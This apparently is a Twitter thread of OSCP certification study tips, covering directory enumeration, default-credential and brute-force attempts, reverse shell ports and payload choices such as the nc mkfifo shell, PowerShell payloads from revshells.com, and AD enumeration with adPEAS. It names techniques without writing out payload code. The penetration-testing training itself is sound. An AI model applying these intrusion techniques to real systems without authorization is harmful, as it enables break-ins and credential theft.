LEARNING OSCP: Day #8
Initial Access tips #1 1. Don't rely on a single wordlist. I had instances where I couldn't find a hidden directory with dirbuster list, I got it when I ran with the dirb big.txt. 2. Don't forget to add extensions to directories: php, txt, html, etc. #oscp
3. Try default passwords on every login function, ftp, ssh, mysql, smb, webdav, pop, etc. Search for the default creds for a specific web software and try to apply an educated guess if the original ones don't work. 4. Always check the source code, for usernames, passwords, etc.
5. Bruteforce all authenticated services with identified strings which look like usernames. 6. Use README.txt/LICENSE.txt/CHANGELOG.txt for enumerating service versions. 7. Not every exploit is available on searchsploit, many times custom exploits from google/github work fine.
8. Port 4444 doesn't always work for reverse connection, target common ports like 80/443 (and where the current service is running) that are likely to be open. 9. I prefer the nc mkfifo payload as it works most of times, but keep trying others like python, php, if they don't.
10. If a payload doesn't work, identify if the command is really installed in the machine, with 'which nc' or 'whereis nc'. Use the given name or full path and try the payload again. 11. Always carefully observe the web content, there might be hints given for the next steps.
• • •
Missing some Tweet in this thread? You can try to
force a refresh
For initial access: 1. Start with the box having a web server, it is the most common path. 2. Use revshells.com for powershell payloads, I prefer the base64 one 3. Just remember Windows prefers '\' rather than '/', don't mess up the syntax. (C:\Users and not C:/Users)
For AD enumeration: 1. Use adPEAS, just like linpeas and winpeas, it is a powershell script for automating domain info gathering and lateral movement vectors: github.com/61106960/adPEAS 2. I would recommend to perform the enum manually before using this to understand better.
It will teach you about connection tools like netcat/socat/PowerShell/Powercat, and using them practically for file transfers, reverse/bind listeners, and channelizing I/O.
We also learn to make simple bash scripts for automation. You'll have practical exercises for each module.
The modules passive info gathering isn't much of a requirement in the exam, though there are some useful tools like google dorks and shodan that might help.
Active info gathering is useful for DNS, SMB, Port scanning, NFS, SMTP and SNMP Enumerations.